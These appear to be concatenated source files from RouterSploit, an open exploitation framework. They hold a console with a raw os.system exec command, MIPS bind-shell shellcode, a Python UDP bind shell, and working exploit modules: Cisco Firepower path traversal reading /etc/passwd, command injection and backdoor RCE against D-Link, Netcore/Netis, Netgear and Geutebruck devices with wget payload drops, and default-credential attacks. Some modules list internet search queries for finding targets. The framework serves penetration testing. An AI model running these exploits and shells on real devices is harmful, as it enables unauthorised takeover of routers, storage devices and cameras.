            devices = self.current_module._Exploit__info__['devices']

            print_info("\nTarget devices:")
            i = 0
            for device in devices:
                if isinstance(device, dict):
                    print_info("   {} - {}".format(i, device['name']))
                else:
                    print_info("   {} - {}".format(i, device))
                i += 1
            print_info()
        except KeyError:
            print_info("\nTarget devices are not defined")

    @module_required
    def _show_wordlists(self, *args, **kwargs):
        headers = ("Wordlist", "Path")
        wordlists = [(f, "file://{}/{}".format(WORDLISTS_DIR, f)) for f in os.listdir(WORDLISTS_DIR) if f.endswith(".txt")]

        print_table(headers, *wordlists, max_column_length=100)

    @module_required
    def _show_encoders(self, *args, **kwargs):
        if issubclass(self.current_module.__class__, BasePayload):
            encoders = self.current_module.get_encoders()
            if encoders:
                headers = ("Encoder", "Name", "Description")
                print_table(headers, *encoders, max_column_length=100)
                return

        print_error("No encoders available")

    def __show_modules(self, root=''):
        for module in [module for module in self.modules if module.startswith(root)]:
            print_info(module.replace('.', os.sep))

    def _show_all(self, *args, **kwargs):
        self.__show_modules()

    def _show_scanners(self, *args, **kwargs):
        self.__show_modules('scanners')

    def _show_exploits(self, *args, **kwargs):
        self.__show_modules('exploits')

    def _show_creds(self, *args, **kwargs):
        self.__show_modules('creds')

    def command_show(self, *args, **kwargs):
        sub_command = args[0]
        try:
            getattr(self, "_show_{}".format(sub_command))(*args, **kwargs)
        except AttributeError:
            print_error("Unknown 'show' sub-command '{}'. "
                        "What do you want to show?\n"
                        "Possible choices are: {}".format(sub_command, self.show_sub_commands))

    @stop_after(2)
    def complete_show(self, text, *args, **kwargs):
        if text:
            return [command for command in self.show_sub_commands if command.startswith(text)]
        else:
            return self.show_sub_commands

    @module_required
    def command_check(self, *args, **kwargs):
        try:
            result = self.current_module.check()
        except Exception as error:
            print_error(error)
        else:
            if result is True:
                print_success("Target is vulnerable")
            elif result is False:
                print_error("Target is not vulnerable")
            else:
                print_status("Target could not be verified")

    def command_help(self, *args, **kwargs):
        print_info(self.global_help)
        if self.current_module:
            print_info("\n", self.module_help)

    def command_exec(self, *args, **kwargs):
        os.system(args[0])

    def command_search(self, *args, **kwargs):
        mod_type = ''
        mod_detail = ''
        mod_vendor = ''
        existing_modules = [name for _, name, _ in pkgutil.iter_modules([MODULES_DIR])]
        devices = [name for _, name, _ in pkgutil.iter_modules([os.path.join(MODULES_DIR, 'exploits')])]
        languages = [name for _, name, _ in pkgutil.iter_modules([os.path.join(MODULES_DIR, 'encoders')])]
        payloads = [name for _, name, _ in pkgutil.iter_modules([os.path.join(MODULES_DIR, 'payloads')])]

        try:
            keyword = args[0].strip("'\"").lower()
        except IndexError:
            keyword = ''

        if not (len(keyword) or len(kwargs.keys())):
            print_error("Please specify at least search keyword. e.g. 'search cisco'")
            print_error("You can specify options. e.g. 'search type=exploits device=routers vendor=linksys WRT100 rce'")
            return

        for (key, value) in kwargs.items():
            if key == 'type':
                if value not in existing_modules:
                    print_error("Unknown module type.")
                    return
                # print_info(' - Type  :\t{}'.format(value))
                mod_type = "{}.".format(value)
            elif key in ['device', 'language', 'payload']:
                if key == 'device' and (value not in devices):
                    print_error("Unknown exploit type.")
                    return
                elif key == 'language' and (value not in languages):
                    print_error("Unknown encoder language.")
                    return
                elif key == 'payload' and (value not in payloads):
                    print_error("Unknown payload type.")
                    return
                # print_info(' - {}:\t{}'.format(key.capitalize(), value))
                mod_detail = ".{}.".format(value)
            elif key == 'vendor':
                # print_info(' - Vendor:\t{}'.format(value))
                mod_vendor = ".{}.".format(value)

        for module in self.modules:
            if mod_type not in str(module):
                continue
            if mod_detail not in str(module):
                continue
            if mod_vendor not in str(module):
                continue
            if not all(word in str(module) for word in keyword.split()):
                continue

            found = humanize_path(module)

            if len(keyword):
                for word in keyword.split():
                    found = found.replace(word, "\033[31m{}\033[0m".format(word))

            print_info(found)

    @stop_after(2)
    def complete_search(self, text, *args, **kwargs):
        if text:
            return [command for command in self.search_sub_commands if command.startswith(text)]
        else:
            return self.search_sub_commands

    def command_exit(self, *args, **kwargs):
        raise EOFError



from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import (
    ArchitectureSpecificPayload,
    Architectures,
    BindTCPPayloadMixin,
)


class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
    __info__ = {
        "name": "MIPSBE Bind TCP",
        "description": "Creates interactive tcp bind shell for MIPSBE architecture.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.MIPSBE

    def generate(self):
        bind_port = utils.convert_port(self.rport)

        return (
            # socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
            b"\x27\xbd\xff\xe0" +        # addiu   sp,sp,-32
            b"\x24\x0e\xff\xfd" +        # li      t6,-3
            b"\x01\xc0\x20\x27" +        # nor     a0,t6,zero
            b"\x01\xc0\x28\x27" +        # nor     a1,t6,zero
            b"\x28\x06\xff\xff" +        # slti    a2,zero,-1
            b"\x24\x02\x10\x57" +        # li      v0,4183 ( __NR_socket )
            b"\x01\x01\x01\x0c" +        # syscall

            # bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
            b"\x30\x50\xff\xff" +        # andi    s0,v0,0xffff
            b"\x24\x0e\xff\xef" +        # li      t6,-17                        ; t6: 0xffffffef
            b"\x01\xc0\x70\x27" +        # nor     t6,t6,zero                    ; t6: 0x10 (16)
            b"\x24\x0d\xff\xfd" +        # li      t5,-3                         ; t5: -3
            b"\x01\xa0\x68\x27" +        # nor     t5,t5,zero                    ; t5: 0x2
            b"\x01\xcd\x68\x04" +        # sllv    t5,t5,t6                      ; t5: 0x00020000
            b"\x24\x0e" + bind_port +    # li      t6,0xFFFF (port)   ; t6: 0x115c (4444 (default LPORT))
            b"\x01\xae\x68\x25" +        # or      t5,t5,t6                      ; t5: 0x0002115c
            b"\xaf\xad\xff\xe0" +        # sw      t5,-32(sp)
            b"\xaf\xa0\xff\xe4" +        # sw      zero,-28(sp)
            b"\xaf\xa0\xff\xe8" +        # sw      zero,-24(sp)
            b"\xaf\xa0\xff\xec" +        # sw      zero,-20(sp)
            b"\x02\x10\x20\x25" +        # or      a0,s0,s0
            b"\x24\x0e\xff\xef" +        # li      t6,-17
            b"\x01\xc0\x30\x27" +        # nor     a2,t6,zero
            b"\x23\xa5\xff\xe0" +        # addi    a1,sp,-32
            b"\x24\x02\x10\x49" +        # li      v0,4169 ( __NR_bind )A
            b"\x01\x01\x01\x0c" +        # syscall

            # listen(3, 257) = 0
            b"\x02\x10\x20\x25" +        # or      a0,s0,s0
            b"\x24\x05\x01\x01" +        # li      a1,257
            b"\x24\x02\x10\x4e" +        # li      v0,4174 ( __NR_listen )
            b"\x01\x01\x01\x0c" +        # syscall

            # accept(3, 0, NULL) = 4
            b"\x02\x10\x20\x25" +        # or      a0,s0,s0
            b"\x28\x05\xff\xff" +        # slti    a1,zero,-1
            b"\x28\x06\xff\xff" +        # slti    a2,zero,-1
            b"\x24\x02\x10\x48" +        # li      v0,4168 ( __NR_accept )
            b"\x01\x01\x01\x0c" +        # syscall

            # dup2(4, 2) = 2
            # dup2(4, 1) = 1
            # dup2(4, 0) = 0
            b"\xaf\xa2\xff\xff" +        # sw v0,-1(sp) # socket
            b"\x24\x11\xff\xfd" +        # li s1,-3
            b"\x02\x20\x88\x27" +        # nor s1,s1,zero
            b"\x8f\xa4\xff\xff" +        # lw a0,-1(sp)
            b"\x02\x20\x28\x21" +        # move a1,s1 # dup2_loop
            b"\x24\x02\x0f\xdf" +        # li v0,4063 ( __NR_dup2 )
            b"\x01\x01\x01\x0c" +        # syscall 0x40404
            b"\x24\x10\xff\xff" +        # li s0,-1
            b"\x22\x31\xff\xff" +        # addi s1,s1,-1
            b"\x16\x30\xff\xfa" +        # bne s1,s0 <dup2_loop>

            # execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0
            b"\x28\x06\xff\xff" +        # slti a2,zero,-1
            b"\x3c\x0f\x2f\x2f" +        # lui t7,0x2f2f "//"
            b"\x35\xef\x62\x69" +        # ori t7,t7,0x6269 "bi"
            b"\xaf\xaf\xff\xec" +        # sw t7,-20(sp)
            b"\x3c\x0e\x6e\x2f" +        # lui t6,0x6e2f "n/"
            b"\x35\xce\x73\x68" +        # ori t6,t6,0x7368 "sh"
            b"\xaf\xae\xff\xf0" +        # sw t6,-16(sp)
            b"\xaf\xa0\xff\xf4" +        # sw zero,-12(sp)
            b"\x27\xa4\xff\xec" +        # addiu a0,sp,-20
            b"\xaf\xa4\xff\xf8" +        # sw a0,-8(sp)
            b"\xaf\xa0\xff\xfc" +        # sw zero,-4(sp)
            b"\x27\xa5\xff\xf8" +        # addiu a1,sp,-8
            b"\x24\x02\x0f\xab" +        # li v0,4011 ( __NR_execve )
            b"\x01\x01\x01\x0c"          # syscall 0x40404
        )



from routersploit.core.exploit.option import OptEncoder
from routersploit.core.exploit.payloads import (
    GenericPayload,
    Architectures,
    BindTCPPayloadMixin,
)
from routersploit.modules.encoders.python.base64 import Encoder


class Payload(BindTCPPayloadMixin, GenericPayload):
    __info__ = {
        "name": "Python Bind UDP",
        "description": "Creates interactive udp bind shell by using python.",
        "authors": (
            "Andre Marques (zc00l)",  # shellpop
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.PYTHON
    encoder = OptEncoder(Encoder(), "Encoder")

    def generate(self):
        return (
            "from subprocess import Popen,PIPE\n" +
            "from socket import socket, AF_INET, SOCK_DGRAM\n" +
            "s=socket(AF_INET,SOCK_DGRAM)\n" +
            "s.bind(('0.0.0.0',{}))\n".format(self.rport) +
            "while 1:\n"
            "\tdata,addr=s.recvfrom(1024)\n" +
            "\tout=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate()\n" +
            "\ts.sendto(''.join([out[0],out[1]]),addr)\n"
        )



import requests
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Cisco Firepower Management 6.0 Path Traversal",
        "description": "Module exploits Cisco Firepower Management 6.0 Path Traversal vulnerability. "
                       "If the target is vulnerable, it is possible to retrieve content of the arbitrary files.",
        "authors": (
            "Matt",  # vulnerability discovery
            "sinn3r",  # Metasploit module
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6435",
            "https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking",
        ),
        "devices": (
            "Cisco Firepower Management Console 6.0",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    path = OptString("/etc/passwd", 'File to read through vulnerability')
    username = OptString("admin", 'Default username to log in')
    password = OptString("Admin123", 'Default password to log in')

    def __init__(self):
        self.session = None

    def run(self):
        self.session = requests.Session()

        if self.check():
            print_success("Target seems to be vulnerable")
            print_status("Trying to authenticate")
            if self.login():
                file_path = "../../..{}".format(self.path)
                path = "/events/reports/view.cgi?download=1&files={}%00".format(file_path)

                print_status("Requesting: {}".format(file_path))
                response = self.http_request(
                    method="GET",
                    path=path,
                    session=self.session
                )

                if response is None:
                    print_error("Exploit failed")
                    return

                print_status("Reading response...")

                if not len(response.text) or "empty or is not available to view" in response.text:
                    print_error("Exploit failed. Empty response.")
                else:
                    print_info(response.text)

            else:
                print_error("Exploit failed. Could not authenticate.")
        else:
            print_error("Exploit failed. Target seems to be not vulnerable.")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/login.cgi?logout=1"
        )

        if response is not None and "6.0.1" in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable

    def login(self):
        data = {
            "username": self.username,
            "password": self.password,
            "target": "",
        }

        response = self.http_request(
            method="POST",
            path="/login.cgi?logout=1",
            data=data,
            allow_redirects=False,
            timeout=30,
            session=self.session
        )

        if response is None:
            return False

        if response.status_code == 302 and "CGISESSID" in response.cookies.get_dict().keys():
            print_status("CGI Session ID: {}".format(response.cookies.get_dict()['CGISESSID']))
            print_success("Authenticated as {}:{}".format(self.username, self.password))
            return True

        return False



import telnetlib

from routersploit.core.exploit.exploit import Exploit
from routersploit.core.exploit.exploit import Protocol
from routersploit.core.exploit.option import OptBool
from routersploit.core.exploit.printer import print_success
from routersploit.core.exploit.printer import print_error


TELNET_TIMEOUT = 30.0


class TelnetCli:
    """ Telnet Client provides methods to handle communication with Telnet server """

    def __init__(self, telnet_target: str, telnet_port: int, verbosity: bool = False) -> None:
        """ Telnet client constructor

        :param str telnet_target: target Telnet server ip address
        :param int telnet_port: target Telnet server port
        :param bool verbosity: display verbose output
        :return None:
        """

        self.telnet_target = telnet_target
        self.telnet_port = telnet_port
        self.verbosity = verbosity

        self.peer = "{}:{}".format(self.telnet_target, self.telnet_port)

        self.telnet_client = None

    def connect(self) -> bool:
        """ Connect to Telnet server

        :return bool: True if connection was successful, False otherwise
        """

        try:
            self.telnet_client = telnetlib.Telnet(self.telnet_target, self.telnet_port, timeout=TELNET_TIMEOUT)
            return True
        except Exception as err:
            print_error(self.peer, "Telnet Error while connecting to the server", err, verbose=self.verbosity)

        return False

    def login(self, username: str, password: str, retries: int = 1) -> bool:
        """ Login to Telnet server

        :param str username: Telnet account username
        :param str password: Telnet account password
        :param int retries: number of authentication retries
        :return bool: True if login was successful, False otherwise
        """

        for _ in range(retries):
            try:
                if not self.connect():
                    continue

                self.telnet_client.expect([b"Login: ", b"login: ", b"Username: ", b"username: "], 5)
                self.telnet_client.write(bytes(username, "utf-8") + b"\r\n")
                self.telnet_client.expect([b"Password: ", b"password: "], 5)
                self.telnet_client.write(bytes(password, "utf-8") + b"\r\n")
                self.telnet_client.write(b"\r\n")

                (i, obj, res) = self.telnet_client.expect([b"Incorrect", b"incorrect"], 5)

                if i == -1 and any([x in res for x in [b"#", b"$", b">"]]) or len(res) > 500:  # big banner e.g. mikrotik
                    print_success(self.peer, "Telnet Authentication Successful - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
                    return True
                else:
                    print_error(self.peer, "Telnet Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
                    break
            except Exception as err:
                print_error(self.peer, "Telnet Error while authenticating to the server", err, verbose=self.verbosity)

        return False

    def test_connect(self) -> bool:
        """ Test connection to Telnet server

        :return bool: True if test connection was successful, False otherwise
        """

        try:
            self.telnet_client = telnetlib.Telnet(self.telnet_target, self.telnet_port, timeout=TELNET_TIMEOUT)
            self.telnet_client.expect([b"Login: ", b"login: ", b"Username: ", b"username: "], 5)
            self.telnet_client.close()

            return True
        except Exception as err:
            print_error(self.peer, "Telnet Error while testing connection to the server", err, verbose=self.verbosity)

        return False

    def interactive(self) -> None:
        """ Start interactive mode with Telnet server

        :return None:
        """

        self.telnet_client.interact()

    def read_until(self, data: bytes) -> bytes:
        """ Read until specified data found in response

        :param bytes data: bytes until which data should be read
        :return bytes: bytes read until data
        """

        try:
            response = self.telnet_client.read_until(data, 5)
            return response
        except Exception as err:
            print_error(self.peer, "Telnet Error while reading data from the server", err, verbose=self.verbosity)

        return None

    def write(self, data: bytes) -> bool:
        """ Write data to Telnet server

        :param bytes data: data that should be written to Telnet server
        :return bool: True if data was written successfuly, False otherwise
        """

        try:
            self.telnet_client.write(data, 5)
            return True
        except Exception as err:
            print_error(self.peer, "Telnet Error while writing to the server", err, verbose=self.verbosity)

        return False

    def close(self) -> bool:
        """ Close connection to Telnet server

        :return bool: True if closing connection was successful, False otherwise
        """

        try:
            self.telnet_client.close()
            return True
        except Exception as err:
            print_error(self.peer, "Telnet Error while closing connection", err, verbose=self.verbosity)

        return False


# pylint: disable=no-member
class TelnetClient(Exploit):
    """ Telnet Client exploit """

    target_protocol = Protocol.TELNET

    verbosity = OptBool(True, "Enable verbose output: true/false")

    def telnet_create(self, target: str = None, port: int = None) -> TelnetCli:
        """ Create Telnet client

        :param str target: target Telnet ip address
        :param int port: target Telnet port
        :return TelnetCli: Telnet client object
        """

        telnet_target = target if target else self.target
        telnet_port = port if port else self.port

        telnet_client = TelnetCli(telnet_target, telnet_port, verbosity=self.verbosity)
        return telnet_client



import re
import string
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DNS-320L & DIR-327L RCE",
        "description": "Module exploits D-Link DNS-320L, DNS-327L Remote Code Execution "
                       "vulnerability which allows executing command on the device.",
        "authors": (
            "Gergely Eberhardt",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://www.search-lab.hu/media/D-Link_Security_advisory_3_0_public.pdf",
        ),
        "devices": (
            "D-Link DNS-320L 1.03b04",
            "D-Link DNS-327L, 1.02",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self)
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        mark = utils.random_text(32)
        path = "/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(cmd, mark)

        response = self.http_request(
            method="GET",
            path=path,
        )
        if response is None:
            return ""

        if mark in response.text:
            regexp = "(|.+?){}".format(mark)
            res = re.findall(regexp, response.text, re.DOTALL)

            if len(res):
                return res[0]

        return ""

    @mute
    def check(self):
        number = int(utils.random_text(6, alph=string.digits))
        solution = number - 1

        cmd = "echo $(({}-1))".format(number)
        path = "/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;" \
               "{};echo ffffffffffffffff;".format(cmd)

        response = self.http_request(
            method="GET",
            path=path
        )
        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200 and str(solution) in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.udp.udp_client import UDPClient


class Exploit(UDPClient):
    __info__ = {
        "name": "Netcore/Netis UDP 53413 RCE",
        "description": "Exploits Netcore/Netis backdoor functionality that allows "
                       "executing commands on operating system level.",
        "authors": (
            "Tim Yeh, Trend Micro",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.seebug.org/vuldb/ssvid-90227",
            "http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/",
        ),
        "devices": (
            "Netcore Router",
            "Netis Router",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(53413, "Target UDP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self, architecture="mipsle", method="wget", location="/var")
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        cmd = bytes(cmd, "utf-8")

        payload = b"AA\x00\x00AAAA" + cmd + b"\x00"
        udp_client = self.udp_create()
        udp_client.send(payload)
        response = udp_client.recv(1024)
        udp_client.udp_close()

        if response:
            return str(response[8:], "utf-8")

        return ""

    @mute
    def check(self):
        response = b""
        payload = b"\x00" * 8

        udp_client = self.udp_create()
        udp_client.send(payload)
        if udp_client:
            response = udp_client.recv(1024)

            if response:
                if response.endswith(b"\xD0\xA5Login:"):
                    return True  # target is vulnerable
                elif response.endswith(b"\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x01\x00\x00"):
                    return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Netgear RAX30 RCE",
        "description": "Module exploits remote command execution in Netgear RAX30 devices. If the target is "
                       "vulnerable, command loop is invoked that allows executing commands on operating system level.",
        "authors": (
            "Pwn2Own 2022 Toronto - multiple researchers",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.synacktiv.com/en/publications/cool-vulns-dont-live-long-netgear-and-pwn2own.html",
            "https://claroty.com/team82/research/chaining-five-vulnerabilities-to-exploit-netgear-nighthawk-rax30-routers-at-pwn2own-toronto-2022",
            "https://mahaloz.re/2023/02/25/pwnagent-netgear.html",
        ),
        "devices": (
            "Netgear RAX30",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection - response is not available")

            shell(self, architecture="armle", method="wget", location="/tmp")
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        headers = {
            "User-Agent": "`{}`".format(cmd)
        }

        self.http_request(
            method="GET",
            path="/",
            headers=headers
        )
        return ""

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/"
        )

        if response and "WWW-Authenticate" in response.headers.keys() and \
          'Basic realm="RAX30"' in response.headers["WWW-Authenticate"]:
            return True

        return False




from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Netgear R7000 & R6400 RCE",
        "description": "Module exploits remote command execution in Netgear R7000 and R6400 devices. If the target is "
                       "vulnerable, command loop is invoked that allows executing commands on operating system level.",
        "authors": (
            "Chad Dougherty",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/",
            "https://www.exploit-db.com/exploits/40889/",
            "http://www.kb.cert.org/vuls/id/582384",
        ),
        "devices": (
            "R6400 (AC1750)",
            "R7000 Nighthawk (AC1900, AC2300)",
            "R7500 Nighthawk X4 (AC2350)",
            "R7800 Nighthawk X4S(AC2600)",
            "R8000 Nighthawk (AC3200)",
            "R8500 Nighthawk X8 (AC5300)",
            "R9000 Nighthawk X10 (AD7200)",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is probably vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection. Try to start telnet with telnet telnetd -p '4445'")
            shell(self, architecture="armle")
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        cmd = cmd.replace(" ", "$IFS")
        path = "/cgi-bin/;{}".format(cmd)

        self.http_request(
            method="GET",
            path=path
        )
        return ""

    @mute
    def check(self):
        response = self.http_request(
            method="HEAD",
            path="/",
        )

        if response is None:
            return False  # target is not vulnerable

        if "WWW-Authenticate" in response.headers.keys():
            if any(map(lambda x: x in response.headers['WWW-Authenticate'], ["NETGEAR R7000", "NETGEAR R6400"])):
                return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Geutebruck G-Cam/EFD-2250 RCE",
        "description": "This module exploits a an arbitrary command execution vulnerability. The"
                       "vulnerability exists in the /uapi-cgi/viewer/simple_loglistjs.cgi page and allows an"
                       "anonymous user to execute arbitrary commands with root privileges.",
        "authors": (
            "Nicolas Mattiocco", #CVE-2018-7520 (RCE)
            "Davy Douhine" #CVE-2018-7520 (RCE) and metasploit module
            "GH0st3rs",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/44957",
            "https://ics-cert.us-cert.gov/advisories/ICSA-18-079-01"
        ),
        "devices": (
            "5.02024 G-Cam/EFD-2250",
        ),
        "search": (
            'Zoomeye search: app:"Geutebruck IP Cameras httpd" +after:"2021-05-06"',
            'Censys search "Geutebruck"',
            'Fofa search: app="GEUTEBRUCK"',
            'Shodan search: "Geutebruck"',
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def execute(self, cmd: str) -> str:
        header = "(){ :;}; "
        self.http_request(
            method='GET',
            path=f"/uapi-cgi/viewer/simple_loglistjs.cgi?{header}{cmd}",
        )
        return ''

    def check(self) -> bool:
        response = self.http_request(method='GET', path="/uapi-cgi/viewer/simple_loglistjs.cgi")
        if response:
            return True
        return False

    def run(self):
        if self.check():
            print_success("Target seams %s:%d is vulnerable", self.target, self.port)
            shell(
                self,
                architecture="armle",
                method="wget",
                location="/var/",
                exec_binary=['chmod 777 {}', '{}']
            )
        else:
            print_error("Exploit failed - target %s:%d seems to be not vulnerable", self.target, self.port)



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "PFSense Router Default Web Interface Creds - HTTP Form",
        "description": "Module performs dictionary attack against PFSense Router web interface. "
                       "If valid credentials are found, they are displayed to the user.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "devices": (
            "PFSense Router",
        ),
    }

    target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
    port = OptPort(443, "Target Web Interface port")
    ssl = OptBool(True, "SSL enabled: true/false")

    threads = OptInteger(1, "Number of threads")
    defaults = OptWordlist("admin:pfsense", "User:Pass or file with default credentials (file://)")
    stop_on_success = OptBool(False, "Stop on first valid authentication attempt")
    verbosity = OptBool(True, "Displaye authentication attempts")

    def run(self):
        self.credentials = []
        self.attack()

    @multi
    def attack(self):
        if not self.check():
            return

        print_status("Starting default creds attack")

        self.run_threads(self.threads, self.target_function, self.defaults)

        if self.credentials:
            print_success("Credentials found!")
            headers = ("Target", "Port", "Service", "Username", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")

    def target_function(self, data):
        username, password = data.split(":", 1)

    def check(self):
        response = self.http_request(
            method="GET",
            path="/",
        )
        if response is None:
            return False

        if all([x in response.text for x in ['<script type="text/javascript" src="/themes/pfsense_ng/javascript/niftyjsCode.js"></script>', 'var csrfMagicToken =']]):
            return True

        return False

    def check_default(self):
        return None



import struct
from bluepy.btle import (
    Peripheral,
    ScanEntry,
    AssignedNumbers
)
from routersploit.core.exploit.printer import (
    print_table,
    print_success,
    print_status,
    print_error,
    color_blue,
    color_green,
    color_red
)
from routersploit.core.exploit.utils import (
    lookup_vendor
)


class Device(ScanEntry):
    """ Single discovered Bluetooth Low Energy device """

    def __init__(self, addr, iface):
        ScanEntry.__init__(self, addr, iface)

        self.vendor = None
        self.data = []

    def _update(self, resp):
        ScanEntry._update(self, resp)

        if self.addrType == "random":
            self.vendor = "None (Random MAC address)"
        else:
            self.vendor = lookup_vendor(self.addr)

        if self.scanData:
            self.data = self._get_data(self.getScanData())

    def print_info(self):
        headers = (color_blue("{} ({} dBm)").format(self.addr, self.rssi), "")
        if self.connectable:
            allow_connection = color_green(str(self.connectable))
        else:
            allow_connection = color_red(str(self.connectable))

        data = [
            ("Vendor", self.vendor),
            ("Allow Connections", allow_connection),
        ]

        for d in self.data:
            data.append((d[0], d[1]))

        print_table(headers, *data, max_column_length=70, extra_fill=3)

    def print_services(self):
        headers = ("Handles", "Service > Characteristics", "Properties", "Data")
        services = self.enumerate_services()

        if services:
            print_table(headers, *services, max_column_length=70, extra_fill=3)

    def enumerate_services(self):
        print_status("Starting enumerating {} ({} dBm) ...".format(self.addr, self.rssi))

        try:
            dev = Peripheral(self, self.addrType)

            services = sorted(dev.services, key=lambda s: s.hndStart)

            data = []
            for service in services:
                if service.hndStart == service.hndEnd:
                    continue

                data.append([
                    "{:04x} -> {:04x}".format(service.hndStart, service.hndEnd),
                    self._get_svc_description(service),
                    "",
                    "",
                ])

                for _, char in enumerate(service.getCharacteristics()):
                    desc = self._get_char_description(char)
                    props = char.propertiesToString()
                    hnd = char.getHandle()
                    value = self._get_char(char, props)

                    data.append([
                        "{:04x}".format(hnd), desc, props, value
                    ])

            dev.disconnect()

            return data

        except Exception as err:
            print_error(err)

        try:
            dev.disconnect()
        except Exception as err:
            print_error(err)

        return None

    def write(self, characteristic, data):
        try:
            dev = Peripheral(self, self.addrType)

            services = sorted(dev.services, key=lambda s: s.hndStart)

            print_status("Searching for characteristic {}".format(characteristic))
            char = None
            for service in services:
                if char is not None:
                    break

                for _, c in enumerate(service.getCharacteristics()):
                    if str(c.uuid) == characteristic:
                        char = c
                        break

            if char:
                if "WRITE" in char.propertiesToString():
                    print_success("Sending {} bytes...".format(len(data)))

                    wwrflag = False

                    if "NO RESPONSE" in char.propertiesToString():
                        wwrflag = True

                    try:
                        char.write(data, wwrflag)
                        print_success("Data sent")
                    except Exception as err:
                        print_error("Error: {}".format(err))

                else:
                    print_error("Not writable")

            dev.disconnect()

        except Exception as err:
            print_error(err)

        try:
            dev.disconnect()
        except Exception:
            pass

        return None

    def _get_data(self, scan_data):
        data = []
        for (tag, desc, val) in scan_data:
            if desc == "Flags":
                data.append(("Flags", self._get_flags(val)))

            elif tag in [8, 9]:
                try:
                    data.append((desc, val))
                except UnicodeEncodeError:
                    data.append((desc, repr(val)))

            else:
                data.append((desc, val))

        return data

    def _get_flags(self, data):
        bits = []
        flags = int(data, 16)

        if self._is_bit_set(flags, 0):
            bits.append("LE Limited Discoverable")

        if self._is_bit_set(flags, 1):
            bits.append("LE General Discoverable")

        if self._is_bit_set(flags, 2):
            bits.append("BR/EDR")

        if self._is_bit_set(flags, 3):
            bits.append("LE + BR/EDR Controller Mode")

        if self._is_bit_set(flags, 4):
            bits.append("LE + BR/EDR Host Mode")

        return ", ".join(bits)

    def _is_bit_set(self, byteval, idx):
        return ((byteval & (1 << idx)) != 0)

    def _get_svc_description(self, service):
        uuid_name = service.uuid.getCommonName()

        if uuid_name and uuid_name != str(service.uuid):
            return "{} ({})".format(color_green(uuid_name), service.uuid)

        return str(service.uuid)

    def _get_char_description(self, char):
        char_name = char.uuid.getCommonName()
        if char_name and char_name != str(char.uuid):
            return "  {} ({})".format(color_green(char_name), char.uuid)

        return "  {}".format(char.uuid)

